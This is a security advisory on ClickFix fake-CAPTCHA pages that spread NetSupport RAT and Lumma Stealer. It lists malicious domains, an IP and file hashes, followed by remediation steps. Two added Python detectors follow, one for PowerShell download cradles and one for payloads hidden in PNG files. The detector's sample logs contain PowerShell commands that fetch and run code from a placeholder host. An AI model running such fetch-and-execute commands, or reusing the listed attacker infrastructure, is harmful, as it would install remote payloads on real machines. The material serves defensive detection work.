Rewterz

Threat Actors Leverage ClickFix to Distribute NetSupport RAT in Recent Cyber Attacks – Active IOCs

Severity

High

Analysis Summary

Threat actors have increasingly adopted the ClickFix technique since early January 2025 to distribute NetSupport RAT, a remote access trojan (RAT) originally designed as a legitimate IT support tool but now repurposed for cyber espionage.

According to researchers, this malware is primarily delivered through fake browser updates and compromised websites, granting attackers full control over the victim’s system. Once installed, NetSupport RAT enables real-time monitoring, file manipulation, and command execution, posing a significant risk to organizations by facilitating the theft of screenshots, audio, video, and sensitive files.

ClickFix operates by injecting fake CAPTCHA pages into compromised websites, deceiving users into manually copying and executing malicious PowerShell commands, which then download and run NetSupport RAT. eSentire’s analysis revealed that the malware payloads are cleverly concealed within PNG image files hosted on remote servers, allowing for stealthy deployment. This tactic enhances persistence and evasion, making detection more challenging for security tools. The attack chain demonstrates a growing trend of social engineering techniques combined with sophisticated payload delivery mechanisms.
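The remediation list further down calls for PowerShell command logging; the following is an added example (not from the advisory or from eSentire) of what a first-pass detection over such logs can look like for the chain described above: a pasted one-liner that fetches a remote resource disguised with an image extension and runs it in memory, optionally hidden behind `-EncodedCommand`. The log records, the field name `CommandText`, the indicator names and weights, and the domain `cdn.example.invalid` are all constructed for this example.

```python
"""Flag ClickFix-style download-and-execute PowerShell in command logs.

Added example. Scores PowerShell command records for the traits described in
the advisory: a download cradle, in-memory execution, window/policy evasion
switches, and a fetched URL that ends in an image extension (the RAT payload
was hidden in PNG files). Records are constructed; cdn.example.invalid is a
placeholder domain.
"""
import base64
import re
from dataclasses import dataclass, field

# Indicator name -> (weight, pattern). Names and weights are choices made for
# this example, not taken from any vendor ruleset.
INDICATORS = {
    "download": (2, re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|net\.webclient|curl|wget)\b", re.I)),
    "execute": (3, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    "hidden_window": (1, re.compile(r"-w(indowstyle)?\s+hidden\b", re.I)),
    "policy_bypass": (1, re.compile(r"-e(p|xecutionpolicy)\s+bypass\b", re.I)),
    "no_profile": (1, re.compile(r"-nop(rofile)?\b", re.I)),
    "image_extension_fetch": (2, re.compile(
        r"https?://\S+?\.(png|jpg|jpeg|gif|bmp)\b", re.I)),
}
COMBO_BONUS = 3          # download + execute together is the cradle itself
ALERT_THRESHOLD = 5
# -EncodedCommand and its abbreviations, followed by a base64 blob.
ENCODED = re.compile(r"-e(nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    record_id: str
    score: int = 0
    indicators: list = field(default_factory=list)
    decoded: str = ""    # decoded -EncodedCommand payload, if any


def decode_encoded_command(text: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ""."""
    m = ENCODED.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(record: dict) -> Finding:
    """Score one record; an encoded payload, if present, is scanned as well."""
    text = record["CommandText"]
    finding = Finding(record_id=record["id"], decoded=decode_encoded_command(text))
    haystack = text + "\n" + finding.decoded
    for name, (weight, pattern) in INDICATORS.items():
        if pattern.search(haystack):
            finding.indicators.append(name)
            finding.score += weight
    if "download" in finding.indicators and "execute" in finding.indicators:
        finding.score += COMBO_BONUS
    return finding


def run_detection(records):
    """Return the findings at or above the alert threshold, in log order."""
    return [f for f in (analyze(r) for r in records) if f.score >= ALERT_THRESHOLD]


# Constructed records. The base64 for the encoded case is generated here so the
# example stays readable; in a real log it appears as the literal string.
_ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/a.png')"
    .encode("utf-16-le")).decode()

SAMPLE_RECORDS = [
    {"id": "evt-1", "CommandText": r"Get-ChildItem C:\Logs | Where-Object {$_.Length -gt 1MB}"},
    {"id": "evt-2", "CommandText": "Invoke-WebRequest -Uri https://status.example.invalid/api/health "
                                   "-UseBasicParsing | ConvertFrom-Json"},
    {"id": "evt-3", "CommandText": "powershell -w hidden -ep bypass -c "
                                   "\"iex (iwr 'http://cdn.example.invalid/verify.png' -UseBasicParsing).Content\""},
    {"id": "evt-4", "CommandText": f"powershell -nop -enc {_ENCODED_PAYLOAD}"},
]

if __name__ == "__main__":
    for f in run_detection(SAMPLE_RECORDS):
        print(f"{f.record_id}: score={f.score} indicators={f.indicators}")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

The benign update check (`evt-2`) downloads but never executes, so it stays below the threshold; the two cradles score high because download and execute appear together, and the encoded variant is caught only because the payload is decoded before scoring. In production the same logic would run over Event ID 4104 script block text and 4688/Sysmon process command lines rather than a single constructed field.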

Additionally, the ClickFix technique has been leveraged to propagate a new version of the Lumma Stealer malware, which now utilizes the ChaCha20 encryption algorithm to obscure its configuration file containing command-and-control (C2) server addresses. This evolution highlights the ongoing efforts of cybercriminals to evade detection and forensic analysis by implementing stronger encryption and obfuscation techniques. The continued refinement of such malware delivery methods underscores the need for heightened vigilance and advanced threat detection strategies in cybersecurity defenses.

Impact

  • File Manipulation
  • Sensitive Data Theft
  • Gain Access

Indicators of Compromise

Domain Name

  • eveverify.com
  • eiesoft.com
  • lynxcm.com
  • incomputersolutions.com
  • findkik.com

IP

  • 92.255.85.135

MD5

  • 9230704646d742931a2e89ae0f187bad
  • ee75b57b9300aab96530503bfae8a2f2

SHA-256

  • 16a178b33877f9c3219bbe1685bfb879b7c8ab8965dbc734fd49ecb02e8c9d01
  • 06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268

SHA-1

  • e23d862807abefae036ddc43e07a0eba46b542c2
  • 98dd757e1c1fa8b5605bda892aa0b82ebefa1f07

Remediation

  • Block all threat indicators at your respective controls.
  • Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
  • Deploy endpoint detection and response (EDR) solutions to monitor and block suspicious activities.
  • Use network-based intrusion detection systems (IDS) to detect anomalous traffic patterns related to RAT activity.
  • Implement web filtering to block access to malicious and compromised websites.
  • Regularly update browser security settings to prevent malicious script execution.
  • Restrict the execution of PowerShell scripts using Group Policy or allowlisting mechanisms.
  • Enable logging for PowerShell commands to detect unauthorized activity.
  • Scan for malicious PNG files and other suspicious attachments using advanced malware detection tools.
  • Use file integrity monitoring (FIM) to detect unauthorized file modifications.
  • Regularly update operating systems, browsers, and security software to mitigate vulnerabilities.
  • Disable unnecessary remote administration tools to reduce the attack surface.
  • Investigate and isolate compromised systems immediately upon detection.
  • Conduct regular threat-hunting exercises to identify hidden infections or persistence mechanisms.
  • Monitor and block communication with known NetSupport RAT and Lumma Stealer command-and-control (C2) servers.
  • Maintain secure, offline backups of critical data to ensure recovery in case of infection.
  • Test backup restoration processes regularly to confirm their effectiveness.
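The analysis notes that the RAT payloads were concealed within PNG files, and the list above asks for such files to be scanned. As an added example, not from the advisory, the following structural check walks a PNG's chunks and reports the two simplest hiding places: data appended after the `IEND` chunk and chunk types the PNG specification does not define. How the payloads in this campaign were actually embedded is not stated in the advisory, so that choice is an assumption; pixel-level steganography would not be caught this way. Both sample files are built in memory, and the appended blob is a labelled placeholder.

```python
"""Structural PNG check for data that does not belong to the image.

Added example. Parses the chunk stream, verifies each CRC, and reports bytes
after IEND, non-standard chunk types and oversized ancillary chunks. The
samples are constructed in memory; the size limit and trailing-data
signatures are choices made for this example.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG specification plus the common eXIf extension.
KNOWN_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP",
    b"sBIT", b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs",
    b"sPLT", b"tIME", b"eXIf",
}
ANCILLARY_SIZE_LIMIT = 64 * 1024      # threshold chosen for this example
TRAILING_SIGNATURES = {                # what appended data often starts with
    b"MZ": "starts with 'MZ', a DOS/PE executable header",
    b"PK\x03\x04": "starts with a ZIP local file header",
    b"\x1f\x8b": "starts with gzip magic",
}


def parse_png(data: bytes):
    """Return ([(type, payload, crc_ok, offset), ...], offset_after_IEND)."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    chunks, pos = [], len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc_field = data[pos + 8 + length:pos + 12 + length]
        if len(payload) < length or len(crc_field) < 4:
            chunks.append((ctype, payload, False, pos))      # truncated chunk
            return chunks, len(data)
        crc_ok = struct.unpack(">I", crc_field)[0] == (zlib.crc32(ctype + payload) & 0xFFFFFFFF)
        chunks.append((ctype, payload, crc_ok, pos))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, pos


def inspect_png(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing stood out."""
    chunks, end = parse_png(data)
    findings = []
    for ctype, payload, crc_ok, offset in chunks:
        if ctype not in KNOWN_CHUNKS:
            findings.append(f"unknown chunk {ctype!r} ({len(payload)} bytes) at offset {offset}")
        if not crc_ok:
            findings.append(f"bad CRC on chunk {ctype!r} at offset {offset}")
        ancillary = bool(ctype[0] & 0x20)          # lowercase first letter
        if ancillary and len(payload) > ANCILLARY_SIZE_LIMIT:
            findings.append(f"oversized ancillary chunk {ctype!r}: {len(payload)} bytes")
    if not chunks or chunks[-1][0] != b"IEND":
        findings.append("no IEND chunk (truncated or malformed)")
    trailing = data[end:]
    if trailing:
        label = next((desc for magic, desc in TRAILING_SIGNATURES.items()
                      if trailing.startswith(magic)), "unrecognised content")
        findings.append(f"{len(trailing)} bytes after IEND ({label})")
    return findings


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def _minimal_png() -> bytes:
    """A valid 1x1 8-bit greyscale PNG built in memory (constructed sample)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    scanline = b"\x00\x00"                          # filter byte + one pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline)) + _chunk(b"IEND", b""))


CLEAN_PNG = _minimal_png()
# Constructed suspicious sample: a placeholder blob both stored in a made-up
# "daTa" chunk before IEND and appended after IEND. Not a real payload.
_FAKE_BLOB = b"MZ" + b"CONSTRUCTED-PAYLOAD-PLACEHOLDER" * 4
SUSPICIOUS_PNG = (CLEAN_PNG[:-12]                    # strip the 12-byte IEND chunk
                  + _chunk(b"daTa", _FAKE_BLOB) + _chunk(b"IEND", b"") + _FAKE_BLOB)

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN_PNG), ("suspicious", SUSPICIOUS_PNG)):
        print(name, inspect_png(sample) or ["no findings"])
```

A file that renders correctly can still carry arbitrary bytes after `IEND` or inside an unknown chunk, because decoders stop at `IEND` and skip chunks they do not recognise; that is why a check at the chunk level, rather than "does it open as an image", is the one worth running on downloaded PNGs in a mail gateway or proxy pipeline.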